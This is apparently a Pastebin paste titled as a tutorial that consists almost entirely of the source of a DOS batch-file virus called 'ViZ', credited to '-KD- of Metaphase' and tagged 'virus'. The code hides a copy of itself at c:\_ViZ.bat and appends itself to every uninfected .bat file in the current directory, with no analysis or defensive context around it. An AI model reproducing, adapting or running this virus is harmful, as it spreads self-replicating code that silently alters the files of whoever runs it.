Advertisement
FlyFar

Tutorials - Batch Virii - ViZ Batch Virus (Code)

Jul 9th, 2023
1,283
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.61 KB | Cybersecurity | 0 0
  1. :: [ViZ] by -KD- of Metaphase
  2.     @echo off%_ViZ%
  3.     if '%1=='ViZ goto ViZ%2
  4.     if exist c:\_ViZ.bat goto ViZstart
  5.     if not exist %0.bat goto ViZexit
  6.     find "ViZ"<%0.bat>c:\_ViZ.bat
  7.     attrib c:\_ViZ.bat +h
  8.     :ViZstart
  9.     if '%!ViZ%=='- goto ViZexit
  10.     set !ViZ=%!ViZ%-
  11.     command /e:5000 /c c:\_ViZ ViZ v
  12.     :DaViZ
  13.     goto ViZexit
  14.     :ViZv
  15.     for %%a in (*.bat) do call c:\_ViZ ViZ inf %%a
  16.     exit ViZ
  17.     :ViZ_inf
  18.     find "ViZ"<%3>nul
  19.     if not errorlevel 1 goto ViZlevel
  20.     type c:\_ViZ.bat>>%3
  21.     exit ViZ
  22.     :ViZlevel
  23.     set ViZ!=%ViZ!%-
  24.     if %ViZ!%==- exit
  25.     :ViZexit
Tags: virus
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement